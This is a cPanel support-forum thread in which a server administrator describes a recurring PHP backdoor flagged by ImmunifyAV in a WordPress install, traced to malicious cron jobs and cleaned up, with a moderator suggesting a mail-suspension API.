Server infected, ImmunifyAV says SMW-BLKH-1485227-php.bkdr

Operating System & Version
centos 7
cPanel & WHM Version
11.104.0.7

Nige_P

Registered
Jul 29, 2022
3
0
1
UK
cPanel Access Level
Root Administrator
When I run ImmunifyAV it says the file /home/.../public_html/wp-includes/options.php is infected by SMW-BLKH-1485227-php.bkdr Google doesn`t show any hits for it.

I can delete the file but if I refresh the folder it reappears again minutes later.

I have no idea how to find the running program that is creating this file and how to then remove it. I can attach the file if necessary, but don`t want to get flagged for attaching an `infected` file.


The cPanel Security Advisor scan shows everything as green and up to date.

Please advise on what further details I need to share so I can fix this.

Thanks.
 
Last edited by a moderator:

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
11,731
1,864
363
cPanel Access Level
Root Administrator
Hey there! Both myself and the backup technician that works forums ended up with the same days off, and Forums aren't usually staffed over the weekend, so that's why you had a longer-than-normal delay getting that approved.

Can you post the resolution you found?
 
  • Like
Reactions: Nige_P

Nige_P

Registered
Jul 29, 2022
3
0
1
UK
cPanel Access Level
Root Administrator
Ahhhhh, just bad timing

It started sending spam emails and I was contacted by my host informing me I had to resolve the issue immediately.

Turned out there were several cron jobs which downloaded the infected files and copied them to the folder above.

Removed all the tasks from the cron queue, deleted the injected files and it's showing as clean.

I still have no idea how the server was infected in the first place, I always ensure the latest patches and plugins are installed.

Not being able to quickly turn off outgoing mail was frustrating, an option to do so in cpanel would be useful for situations like this. I had to stop the mail processes and edit php.ini to disable the mail processes.
 

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
11,731
1,864
363
cPanel Access Level
Root Administrator
We have an API call you can use to suspend mail:


so that could be of use in the future if that happens again.